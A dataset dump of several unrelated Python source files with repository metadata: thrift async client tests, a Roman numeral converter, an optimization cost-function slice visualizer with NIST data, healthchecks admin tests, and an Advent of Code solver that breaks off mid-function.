        self.cpp_info.libs = [
            "grpc++_unsecure",
            "grpc++_reflection",
            "grpc++_error_details",
            "grpc++",
            "grpc_unsecure",
            "grpc_plugin_support",
            "grpc_cpp_plugin",
            "grpc_cronet",
            "grpcpp_channelz",
            "grpc",
            "gpr",
            "address_sorting",
            "upb",
        ]
        if self.settings.compiler == "Visual Studio":
            self.cpp_info.system_libs += ["wsock32", "ws2_32"]
acfb51f522062460a7ee3669171eb1d2de895e57 | 4,510 | py | Python | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from later.unittest import TestCase
from thrift.py3lite.async_client import ClientType, get_client
from thrift.py3lite.exceptions import ApplicationError
from thrift.py3lite.leaf.lite_clients import LeafService
from thrift.py3lite.serializer import Protocol
from thrift.py3lite.test.lite_clients import EchoService, TestService
from thrift.py3lite.test.lite_types import ArithmeticException, EmptyException
from thrift.py3lite.test.test_server import server_in_event_loop
class AsyncClientTests(TestCase):
    """End-to-end tests for the py3lite async thrift client against a local test server."""
    async def test_basic(self) -> None:
        """Round-trip a simple add() RPC."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                sum = await client.add(1, 2)
                self.assertEqual(3, sum)
    async def test_client_type_and_protocol(self) -> None:
        """add() still works with an explicit client type and BINARY protocol."""
        async with server_in_event_loop() as addr:
            async with get_client(
                TestService,
                host=addr.ip,
                port=addr.port,
                client_type=ClientType.THRIFT_ROCKET_CLIENT_TYPE,
                protocol=Protocol.BINARY,
            ) as client:
                sum = await client.add(1, 2)
                self.assertEqual(3, sum)
    async def test_void_return(self) -> None:
        """A void RPC resolves to None."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                res = await client.noop()
                self.assertIsNone(res)
    async def test_exception(self) -> None:
        """A declared thrift exception is raised client-side (divide by zero)."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                res = await client.divide(6, 3)
                self.assertAlmostEqual(2, res)
                with self.assertRaises(ArithmeticException):
                    await client.divide(1, 0)
    async def test_void_return_with_exception(self) -> None:
        """A void RPC can still raise its declared exception."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                with self.assertRaises(EmptyException):
                    await client.oops()
    async def test_oneway(self) -> None:
        """A oneway RPC returns None immediately."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                res = await client.oneway()
                self.assertIsNone(res)
                await asyncio.sleep(1)  # wait for server to clear the queue
    async def test_unexpected_exception(self) -> None:
        """An undeclared server-side error surfaces as ApplicationError."""
        async with server_in_event_loop() as addr:
            async with get_client(TestService, host=addr.ip, port=addr.port) as client:
                with self.assertRaises(ApplicationError) as ex:
                    await client.surprise()
                self.assertEqual(ex.exception.message, "ValueError('Surprise!')")
                self.assertEqual(ex.exception.type, 0)
    async def test_derived_service(self) -> None:
        """A derived service exposes both its own and inherited methods."""
        async with server_in_event_loop() as addr:
            async with get_client(EchoService, host=addr.ip, port=addr.port) as client:
                out = await client.echo("hello")
                self.assertEqual("hello", out)
                sum = await client.add(1, 2)
                self.assertEqual(3, sum)
    async def test_deriving_from_external_service(self) -> None:
        """A service derived from an externally-defined service works end to end."""
        async with server_in_event_loop() as addr:
            async with get_client(LeafService, host=addr.ip, port=addr.port) as client:
                rev = await client.reverse([1, 2, 3])
                # TODO: shouldn't need the explicit list conversion
                self.assertEqual([3, 2, 1], list(rev))
                out = await client.echo("hello")
                self.assertEqual("hello", out)
                sum = await client.add(1, 2)
                self.assertEqual(3, sum)
| 45.555556 | 87 | 0.647228 |
acfb520fe3b10e5d15ca06875db3f3919145d3bb | 2,785 | py | Python | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 52 | 2015-01-28T21:22:19.000Z | 2022-03-15T09:21:07.000Z | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 742 | 2015-01-06T00:21:30.000Z | 2021-08-02T20:57:17.000Z | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 24 | 2015-07-28T17:06:30.000Z | 2021-08-18T21:28:53.000Z | """
Convert to and from Roman numerals
This program is part of "Dive Into Python", a free Python tutorial for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
This program is free software; you can redistribute it and/or modify
it under the terms of the Python 2.1.1 license, available at
http://www.python.org/2.1.1/license.html
Note:
This has been modified to add optional characters
after the initial roman numbers by nlw.
"""
import re
__author__ = "Mark Pilgrim (f8dy@diveintopython.org)"
__version__ = "1.4"
__date__ = "8 August 2001"
__copyright__ = "Copyright (c) 2001 Mark Pilgrim"
# Define digit's regular expression mapping
romanNumeralMap = (('M', 1000),
                   ('CM', 900),
                   ('D', 500),
                   ('CD', 400),
                   ('C', 100),
                   ('XC', 90),
                   ('L', 50),
                   ('XL', 40),
                   ('X', 10),
                   ('IX', 9),
                   ('V', 5),
                   ('IV', 4),
                   ('I', 1))


def toRoman(num):
    """Convert an integer in 1..4999 to a Roman numeral string.

    Raises:
        ValueError: if num is outside 1..4999.
        TypeError: if num is not a whole number.
    """
    if not 0 < num < 5000:
        # Fixed: the original passed ('... %n ...', num) as two arguments to
        # ValueError, so the message was never formatted ('%n' is not even a
        # valid conversion). Format the number into the message properly.
        raise ValueError("number %s out of range (must be 1..4999)" % num)
    if int(num) != num:
        # Fixed for the same reason as above.
        raise TypeError("decimal %s can not be converted" % num)

    result = ""
    # Greedily take the largest token that still fits; the map is in
    # descending order of value, so this yields the canonical numeral.
    for numeral, integer in romanNumeralMap:
        while num >= integer:
            result += numeral
            num -= integer
    return result


# Pattern accepting a Roman numeral, where the trailing [A-Z] absorbs either
# the numeral's own final letter or an extra suffix letter (e.g. 'XIVA') --
# the "plus" modification of this module.
romanNumeralPattern = re.compile("""
    ^                   # beginning of string
    M{0,4}              # thousands - 0 to 4 M's
    (CM|CD|D?C{0,3})    # hundreds - 900 (CM), 400 (CD), 0-300 (0 to 3 C's),
                        #            or 500-800 (D, followed by 0 to 3 C's)
    (XC|XL|L?X{0,3})    # tens - 90 (XC), 40 (XL), 0-30 (0 to 3 X's),
                        #        or 50-80 (L, followed by 0 to 3 X's)
    (IX|IV|V?I{0,3})    # ones - 9 (IX), 4 (IV), 0-3 (0 to 3 I's),
                        #        or 5-8 (V, followed by 0 to 3 I's)
    [A-Z]               # final letter: numeral tail or optional suffix
    $                   # end of string
    """, re.VERBOSE)


def fromRoman(strng):
    """Convert a Roman numeral string (optional suffix letter allowed) to int.

    Raises:
        TypeError: if strng is empty or None.
        ValueError: if strng does not match the Roman numeral pattern.
    """
    if not strng:
        raise TypeError('Input can not be blank')
    if not romanNumeralPattern.search(strng):
        # Fixed: the original passed (message, strng) as two arguments,
        # leaving the '%s' placeholder unformatted in the exception text.
        raise ValueError('Invalid Roman numeral: %s' % strng)

    result = 0
    index = 0
    # Consume tokens left to right; any trailing suffix letter is simply
    # not consumed and contributes nothing to the value.
    for numeral, integer in romanNumeralMap:
        while strng[index:index + len(numeral)] == numeral:
            result += integer
            index += len(numeral)
    return result
| 33.154762 | 76 | 0.521724 |
acfb52c4c6c61e2388b978c549354c91b695aeab | 15,572 | py | Python | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | ########################################################
##
## Test for high-dimensional visualization
## COSC 3307 WI 2021
##
## NIST cost functions: MGH17, ENSO, Rat43
## Other cost functions: Styblinski-Tang, Rastrigin, Sphere,
## Rosenbrock, Qing, Michalewicz, Salomon, Deb3
##
## See (e.g. for MGH17):
## https://www.itl.nist.gov/div898/strd/nls/data/mgh17.shtml
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/DATA/MGH17.dat
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/v-mgh17.shtml
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/s-mgh17.shtml
##
## For other NIST functions, see:
## https://www.itl.nist.gov/div898/strd/nls/nls_main.shtml
##
## Dr. M. Wachowiak
## 4/28/21 -- 5/1/21
##
##
########################################################
import numpy as np
## For TSNE....
from sklearn.manifold import TSNE
## For interpolation....
from scipy.interpolate import griddata
## For plotting....
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
## For Plotly graphics....
import plotly.graph_objects as go
############################################
##
## Cost functions....
##
############################################
##########################################
## Styblinski-Tang
##########################################
def StybTang(x):
    """Styblinski-Tang benchmark: 0.5 * sum(x_i**4 - 16*x_i**2 + 5*x_i).

    x is expected to be a numpy array (elementwise ** and * are used).
    """
    # Fixed: removed the unused local 'd'.
    return sum(x**4 - 16*x**2 + 5*x) / 2.0
##########################################
## Qing
##########################################
def Qing(x):
    """Qing benchmark: sum over i = 1..d of (x_i**2 - i)**2."""
    d = len(x)
    targets = np.arange(0, d) + 1
    return sum((x ** 2 - targets) ** 2)
##########################################
## Rosenbrock
##########################################
def Rosenbrock(x):
    """Rosenbrock benchmark: sum of 100*(x[i+1] - x[i]**2)**2 + (1 - x[i])**2."""
    total = 0.0
    # Walk consecutive coordinate pairs instead of indexing by position.
    for cur, nxt in zip(x[:-1], x[1:]):
        total += 100.0 * (nxt - cur ** 2) ** 2 + (1.0 - cur) ** 2
    return total
##########################################
## Sphere
##########################################
def Sphere(x):
    """Sphere benchmark: the sum of squared coordinates (minimum 0 at the origin)."""
    squares = x ** 2
    return sum(squares)
##########################################
## Michalewicz
##########################################
def Michalewicz(x):
    """Michalewicz benchmark: -sum_i sin(x_i) * sin(i * x_i**2 / pi)**(2*m).

    The steepness parameter m is hard-coded to 10.
    """
    d = len(x)
    m = 10
    # Steepness weights: sin(i * x_i^2 / pi) ** (2m), i = 1..d.
    weights = np.sin((np.linspace(1, d, num = d) * (x ** 2)) / np.pi) ** (2 * m)
    return -sum(np.sin(x) * weights)
##########################################
## Rastrigin
##########################################
def Rastrigin(x):
    """Rastrigin benchmark: A*d + sum(x_i**2 - A*cos(2*pi*x_i)), A = 10."""
    A = 10
    acc = 0.0
    # Iterate the coordinates directly rather than by index; the A*d offset
    # is added last, exactly as in the accumulation order of the original.
    for xi in x:
        acc += xi ** 2 - A * np.cos(2.0 * np.pi * xi)
    return acc + A * len(x)
##########################################
## Salomon
##########################################
def Salomon(x):
    """Salomon benchmark: 1 - cos(2*pi*||x||) + 0.1*||x||.

    Non-negative, with value 0 at the origin.
    """
    # Fixed: removed the unused local 'd'.
    s0 = np.sqrt(sum(x ** 2))
    s = 1.0 - np.cos(2.0 * np.pi * s0) + (0.1 * s0)
    return s
##########################################
## Deb3
##########################################
def Deb3(x):
    """Deb's third benchmark: -(1/d) * sum(sin(5*pi*(x_i**(3/4) - 0.05))**6)."""
    d = len(x)
    sixth_powers = np.sin(5.0 * np.pi * ((x ** (3/4)) - 0.05)) ** 6
    return -1.0/d * sum(sixth_powers)
##########################################
## MGH17 (NIST)
##########################################
def MGH17(beta):
    """RMSE of the NIST MGH17 model against the module-level RESP_VARS data.

    Model: y = b0 + b1*exp(-b3*x) + b2*exp(-b4*x); RESP_VARS rows are
    (observed y, x). beta has 5 entries (see cert_MGH17).
    """
    d = len(beta) ## 5
    N = len(RESP_VARS) ## Global
    s = 0.0
    for i in range(0, N):
        y0 = RESP_VARS[i][0]
        x = RESP_VARS[i][1]
        y = beta[0] + beta[1]*np.exp(-beta[3]*x) + beta[2]*np.exp(-beta[4]*x)
        # Accumulate the mean squared residual incrementally.
        s += ((y0 - y)**2)/N
    s = np.sqrt(s)
    return(s)
##########################################
## Rat43 (NIST)
##########################################
def Rat43(beta):
    """RMSE of the NIST Rat43 model against the module-level RAT43_DATA.

    Model: y = b0 / (1 + exp(b1 - b2*x))**(1/b3); RAT43_DATA rows are
    (observed y, x). beta has 4 entries (see cert_Rat43).
    """
    d = len(beta) ## 4
    N = len(RAT43_DATA) ## Global
    s = 0.0
    for i in range(0, N):
        y0 = RAT43_DATA[i][0]
        x = RAT43_DATA[i][1]
        y = beta[0] / ((1.0 + np.exp(beta[1] - beta[2]*x))**(1.0/beta[3]))
        # Accumulate the mean squared residual incrementally.
        s += ((y0 - y)**2)/N
    s = np.sqrt(s)
    return(s)
##########################################
## ENSO (NIST)
##########################################
def ENSO(beta):
    """RMSE of the NIST ENSO model against the module-level ENSO_DATA.

    Model: fixed 12-month cycle plus two fitted periodic terms with periods
    beta[3] and beta[6]; ENSO_DATA rows are (observed y, x). beta has 9
    entries (see cert_ENSO).
    """
    d = len(beta) ## 9
    N = len(ENSO_DATA) ## Global
    TwoPI = 2.0 * np.pi
    s = 0.0
    for i in range(0, N):
        y0 = ENSO_DATA[i][0]
        x = ENSO_DATA[i][1]
        y = beta[0] + beta[1]*np.cos(TwoPI * x / 12.0) + beta[2]*np.sin(TwoPI * x / 12.0) + beta[4]*np.cos(TwoPI * x / beta[3]) + beta[5]*np.sin(TwoPI * x / beta[3]) + beta[7]*np.cos(TwoPI * x / beta[6]) + beta[8]*np.sin(TwoPI * x / beta[6])
        # Accumulate the mean squared residual incrementally.
        s += ((y0 - y)**2)/N
    s = np.sqrt(s)
    return(s)
###################################################################
##
## Get a slice from the volume....
##
###################################################################
def getVolumeSlice(plane, islice, X, Xinterp, gx, gy, gz):
    """Extract one 2-D slice of interpolated values from the point volume.

    plane selects the axis held fixed (0 -> gx, 1 -> gy, anything else -> gz)
    and islice picks the grid coordinate along that axis. All rows of X whose
    'plane' coordinate equals that value are gathered from Xinterp and
    reshaped into an (Ngrid x Ngrid) image.
    """
    n = len(gx)
    # Resolve the fixed coordinate value of the requested slice.
    if plane == 0:
        coord = gx[islice]
    elif plane == 1:
        coord = gy[islice]
    else:
        coord = gz[islice]
    # Select every sample point lying on that plane and image its values.
    hits = np.where(X[:, plane] == coord)
    return np.reshape(Xinterp[hits], (n, n))
#####################################################
##
## Get a 2D slice directly from the points....
##
#####################################################
def getPointCloudSlice(plane, BETA, rmse, Ngrid):
    """Linearly interpolate rmse over the two parameter axes given by 'plane'.

    BETA holds the sample points (one row per sample); 'plane' is a pair of
    column indices. Returns an (Ngrid x Ngrid) image spanning the bounding
    box of the selected columns.
    """
    pts = BETA[:, plane]
    x_lo, x_hi = np.min(pts[:, 0]), np.max(pts[:, 0])
    y_lo, y_hi = np.min(pts[:, 1]), np.max(pts[:, 1])
    grid_x, grid_y = np.meshgrid(np.linspace(x_lo, x_hi, num = Ngrid),
                                 np.linspace(y_lo, y_hi, num = Ngrid))
    return griddata(pts, rmse, (grid_x, grid_y), method = 'linear')
#####################################################
##
## Evaluate the grid directly....
##
#####################################################
def getFunctionSlice(f, v, Ngridx, Ngridy, LB, UB):
    """Evaluate cost function f on a 2-D grid over the two NaN dimensions of v.

    The first NaN entry of v is the x axis, the second the y axis; all other
    entries stay fixed at their given values. Returns (Z, gx, gy) where
    Z[j][i] = f(v with x = gx[i], y = gy[j]) -- rows follow y, matching the
    (Ngridy, Ngridx) allocation and the plotly Heatmap convention.
    """
    ## First NaN is x, second NaN is y....
    indx = np.where(np.isnan(v))
    indx = indx[0]
    Z = np.zeros((Ngridy, Ngridx))
    gx = np.linspace(LB[indx[0]], UB[indx[0]], num = Ngridx)
    gy = np.linspace(LB[indx[1]], UB[indx[1]], num = Ngridy)
    x = np.copy(v)
    for j in range(0, Ngridy):
        for i in range(0, Ngridx):
            x[indx[0]] = gx[i]
            x[indx[1]] = gy[j]
            # Fixed: was Z[i][j], which transposed the image and raised an
            # IndexError whenever Ngridx != Ngridy (Z is (Ngridy, Ngridx)).
            Z[j][i] = f(x)
    return(Z, gx, gy)
###################################################################
##
## Begin program....
##
###################################################################
###################################################
## MGH17 data
## See https://www.itl.nist.gov/div898/strd/nls/data/LINKS/s-mgh17.shtml
###################################################
RESP_VARS = np.array([
[8.440000E-01, 0.000000E+00],
[9.080000E-01, 1.000000E+01],
[9.320000E-01, 2.000000E+01],
[9.360000E-01, 3.000000E+01],
[9.250000E-01, 4.000000E+01],
[9.080000E-01, 5.000000E+01],
[8.810000E-01, 6.000000E+01],
[8.500000E-01, 7.000000E+01],
[8.180000E-01, 8.000000E+01],
[7.840000E-01, 9.000000E+01],
[7.510000E-01, 1.000000E+02],
[7.180000E-01, 1.100000E+02],
[6.850000E-01, 1.200000E+02],
[6.580000E-01, 1.300000E+02],
[6.280000E-01, 1.400000E+02],
[6.030000E-01, 1.500000E+02],
[5.800000E-01, 1.600000E+02],
[5.580000E-01, 1.700000E+02],
[5.380000E-01, 1.800000E+02],
[5.220000E-01, 1.900000E+02],
[5.060000E-01, 2.000000E+02],
[4.900000E-01, 2.100000E+02],
[4.780000E-01, 2.200000E+02],
[4.670000E-01, 2.300000E+02],
[4.570000E-01, 2.400000E+02],
[4.480000E-01, 2.500000E+02],
[4.380000E-01, 2.600000E+02],
[4.310000E-01, 2.700000E+02],
[4.240000E-01, 2.800000E+02],
[4.200000E-01, 2.900000E+02],
[4.140000E-01, 3.000000E+02],
[4.110000E-01, 3.100000E+02],
[4.060000E-01, 3.200000E+02]
])
###################################################
## RAT43 data
###################################################
RAT43_DATA = np.array([[16.08E0, 1.0E0],
[33.83E0, 2.0E0],
[65.80E0, 3.0E0],
[97.20E0, 4.0E0],
[191.55E0, 5.0E0],
[326.20E0, 6.0E0],
[386.87E0, 7.0E0],
[520.53E0, 8.0E0],
[590.03E0, 9.0E0],
[651.92E0, 10.0E0],
[724.93E0, 11.0E0],
[699.56E0, 12.0E0],
[689.96E0, 13.0E0],
[637.56E0, 14.0E0],
[717.41E0, 15.0E0]
])
###################################################
## ENSO data
###################################################
ENSO_DATA = np.array([[12.9,1],
[11.3,2],
[10.6,3],
[11.2,4],
[10.9,5],
[7.5,6],
[7.7,7],
[11.7,8],
[12.9,9],
[14.3,10],
[10.9,11],
[13.7,12],
[17.1,13],
[14,14],
[15.3,15],
[8.5,16],
[5.7,17],
[5.5,18],
[7.6,19],
[8.6,20],
[7.3,21],
[7.6,22],
[12.7,23],
[11,24],
[12.7,25],
[12.9,26],
[13,27],
[10.9,28],
[10.4,29],
[10.2,30],
[8,31],
[10.9,32],
[13.6,33],
[10.5,34],
[9.2,35],
[12.4,36],
[12.7,37],
[13.3,38],
[10.1,39],
[7.8,40],
[4.8,41],
[3,42],
[2.5,43],
[6.3,44],
[9.7,45],
[11.6,46],
[8.6,47],
[12.4,48],
[10.5,49],
[13.3,50],
[10.4,51],
[8.1,52],
[3.7,53],
[10.7,54],
[5.1,55],
[10.4,56],
[10.9,57],
[11.7,58],
[11.4,59],
[13.7,60],
[14.1,61],
[14,62],
[12.5,63],
[6.3,64],
[9.6,65],
[11.7,66],
[5,67],
[10.8,68],
[12.7,69],
[10.8,70],
[11.8,71],
[12.6,72],
[15.7,73],
[12.6,74],
[14.8,75],
[7.8,76],
[7.1,77],
[11.2,78],
[8.1,79],
[6.4,80],
[5.2,81],
[12,82],
[10.2,83],
[12.7,84],
[10.2,85],
[14.7,86],
[12.2,87],
[7.1,88],
[5.7,89],
[6.7,90],
[3.9,91],
[8.5,92],
[8.3,93],
[10.8,94],
[16.7,95],
[12.6,96],
[12.5,97],
[12.5,98],
[9.8,99],
[7.2,100],
[4.1,101],
[10.6,102],
[10.1,103],
[10.1,104],
[11.9,105],
[13.6,106],
[16.3,107],
[17.6,108],
[15.5,109],
[16,110],
[15.2,111],
[11.2,112],
[14.3,113],
[14.5,114],
[8.5,115],
[12,116],
[12.7,117],
[11.3,118],
[14.5,119],
[15.1,120],
[10.4,121],
[11.5,122],
[13.4,123],
[7.5,124],
[0.6,125],
[0.3,126],
[5.5,127],
[5,128],
[4.6,129],
[8.2,130],
[9.9,131],
[9.2,132],
[12.5,133],
[10.9,134],
[9.9,135],
[8.9,136],
[7.6,137],
[9.5,138],
[8.4,139],
[10.7,140],
[13.6,141],
[13.7,142],
[13.7,143],
[16.5,144],
[16.8,145],
[17.1,146],
[15.4,147],
[9.5,148],
[6.1,149],
[10.1,150],
[9.3,151],
[5.3,152],
[11.2,153],
[16.6,154],
[15.6,155],
[12,156],
[11.5,157],
[8.6,158],
[13.8,159],
[8.7,160],
[8.6,161],
[8.6,162],
[8.7,163],
[12.8,164],
[13.2,165],
[14,166],
[13.4,167],
[14.8,168]])
## Default bounds....
LB = np.array([-10, -10, -10, -10, -10, -10, -10])
UB = np.array([10, 10, 10, 10, 10, 10, 10])
################################################################
##
## Certified values and bounds for the NIST functions....
##
################################################################
cert_MGH17 = np.array([3.7541005211E-01,1.9358469127E+00,
-1.4646871366E+00,1.2867534640E-02,
2.2122699662E-02])
cert_Rat43 = np.array([6.9964151270E+02,5.2771253025E+00,7.5962938329E-01,1.2792483859E+00])
cert_ENSO = np.array([1.0510749193E+01,3.0762128085E+00,5.3280138227E-01,4.4311088700E+01,-1.6231428586E+00,5.2554493756E-01,2.6887614440E+01,2.1232288488E-01,1.4966870418E+00])
LB_ENSO = np.array([0.,0.,0.,20.,-3.,-5.,5.,-1.,0.])
UB_ENSO = np.array([20.,10.,2.,80.,0.05,5,40.,2.,5.])
LB_MGH17 = np.array([0, 0, -100, 0, 0, 0])
UB_MGH17 = np.array([50, 150, -0.1, 10, 2])
LB_Rat43 = np.array([100, 0, 0, 0])
UB_Rat43 = np.array([900, 10, 2, 5])
##########################################################################
##
## Sample graphics session....
##
## NOTE: The Z matrix (the 2D function evaluation values)
## can be displayed as they are (Plotly will adjust the mapping)
## or they can be transformed to assist visualizing subtle features.
##
## E.g. if all the values are > 0, then np.log(Z) can be displayed, as
## can np.sqrt(Z), or even Z**(1/4).
## Alternately, Z can be scaled to [0, 1] and subsequently transformed.
## E.g. Z1 = (Z - np.min(Z)) / (np.max(Z) - np.min(Z)).
## Then, Z1 can be transformed; e.g. np.sqrt(Z1) or Z1 ** (1/4).
##
##########################################################################
###################################
## Example 1 -- ENSO
###################################
v = np.copy(cert_ENSO)
v[[0, 3]] = np.nan ## Grid is on dimensions 0 and 3....
LB = np.copy(LB_ENSO)
UB = np.copy(UB_ENSO)
## Number of points (pixels) on the grid....
Ngridx = 140
Ngridy = 140
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(ENSO, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
## Plot the transformed output with Plotly....
## NOTE: RMSE > 0 (the data do not fit the model perfectly to obtain RMSE = 0).
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
###################################
## Example 2 -- Michalewicz
###################################
## Search space ranges from 0 to Pi.
D = 10
LB = np.zeros(D)
UB = np.zeros(D) + np.pi
v = np.random.rand(D) * np.pi
v[[4, 8]] = np.nan ## Grid is on dimensions 4 and 8....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Michalewicz, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
###################################
## Example 3 -- Deb3
###################################
## Search space ranges from 0 to 1.
D = 8
LB = np.zeros(D)
UB = np.zeros(D) + 1
v = np.random.rand(D)
v[[1, 7]] = np.nan ## Grid is on dimensions 1 and 7....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Deb3, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
###################################
## Example 4 -- Rosenbrock
###################################
## Search space ranges from -5 to 5.
D = 8
LB = np.zeros(D) - 5
UB = np.zeros(D) + 5
v = np.zeros(D) + 1
v[[2, 6]] = np.nan ## Grid is on dimensions 2 and 6....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Rosenbrock, v, Ngridx, Ngridy, LB, UB)
## Plot the transformed cost function with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
###################################
## Example 5 -- Salomon
###################################
## Search space ranges from -100 to 100.
D = 12
LB = np.zeros(D) - 100
UB = np.zeros(D) + 100
v = np.random.rand(D) * 200 - 100
v[[3, 9]] = np.nan ## Grid is on dimensions 3 and 9....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Salomon, v, Ngridx, Ngridy, LB, UB)
## Plot the transformed cost function with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
| 21.331507 | 241 | 0.439571 |
acfb52d6aeeea4f10cbb0c326aaf70f03e91f45d | 1,099 | py | Python | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:14:00.000Z | 2021-06-10T23:14:00.000Z | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | from hc.api.models import Channel, Check
from hc.test import BaseTestCase
class ApiAdminTestCase(BaseTestCase):
    """Admin changelist smoke tests for the api app's Channel model."""
    def setUp(self):
        """Create a check and promote alice to a superuser so /admin/ is reachable."""
        super(ApiAdminTestCase, self).setUp()
        self.check = Check.objects.create(project=self.project, tags="foo bar")
        self.alice.is_staff = True
        self.alice.is_superuser = True
        self.alice.save()
    def test_it_shows_channel_list_with_pushbullet(self):
        """The channel changelist renders a pushbullet channel."""
        self.client.login(username="alice@example.org", password="password")
        Channel.objects.create(project=self.project, kind="pushbullet",
                               value="test-token")
        r = self.client.get("/admin/api/channel/")
        self.assertContains(r, "Pushbullet")
    def test_it_shows_channel_list_with_unverified_email(self):
        """The changelist marks an email channel that was never confirmed."""
        self.client.login(username="alice@example.org", password="password")
        Channel.objects.create(project=self.project, kind="email",
                               value="foo@example.org")
        r = self.client.get("/admin/api/channel/")
        self.assertContains(r, "Email <i>(unconfirmed)</i>")
| 34.34375 | 79 | 0.652411 |
acfb52e0e74ebdf8389e7f9ab1eee1ddfa6455c3 | 1,648 | py | Python | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | 1 | 2021-12-08T19:01:56.000Z | 2021-12-08T19:01:56.000Z | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | null | null | null | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | null | null | null | import itertools
# 1 when the pattern length uniquely identifies digit 1, 4, 7 or 8 (part 1).
check_1478 = lambda x: 1 if len(x) in [2,3,4,7] else 0
# Extract the output-value patterns (after the " | " separator) of one line.
split_signals = lambda x: x.split(" | ")[1].split(" ")
# Puzzle input, one note entry per line (read eagerly at import time).
file = open("input8.txt", "r").read().splitlines()
def calculate_result(line):
    """Decode one seven-segment note line and return its 4-digit output value.

    Patterns of unique length identify digits 1 (2 segments), 7 (3) and 4 (4);
    the remaining five- and six-segment patterns are told apart by how many
    segments they share with the patterns of 1 and 4.
    """
    def canon(pattern):
        # Segment order is scrambled, so compare sorted segment strings.
        return "".join(sorted(pattern))

    patterns_part, output_part = line.split(" | ")
    patterns = sorted(patterns_part.split(" "), key=len)
    outputs = output_part.split(" ")

    segs = {8: 'abcdefg'}
    segs[1] = canon(patterns[0])   # only digit with 2 segments
    segs[7] = canon(patterns[1])   # only digit with 3 segments
    segs[4] = canon(patterns[2])   # only digit with 4 segments

    for pat in patterns[3:]:
        shared1 = len(set(pat) & set(segs[1]))
        shared4 = len(set(pat) & set(segs[4]))
        if len(pat) == 5:
            if shared1 == 2:
                segs[3] = canon(pat)
            elif shared4 == 3:
                segs[5] = canon(pat)
            else:
                segs[2] = canon(pat)
        elif len(pat) == 6:
            if shared1 == 1:
                segs[6] = canon(pat)
            elif shared4 == 4:
                segs[9] = canon(pat)
            else:
                segs[0] = canon(pat)

    # Invert digit -> segments into a lookup table for the output patterns.
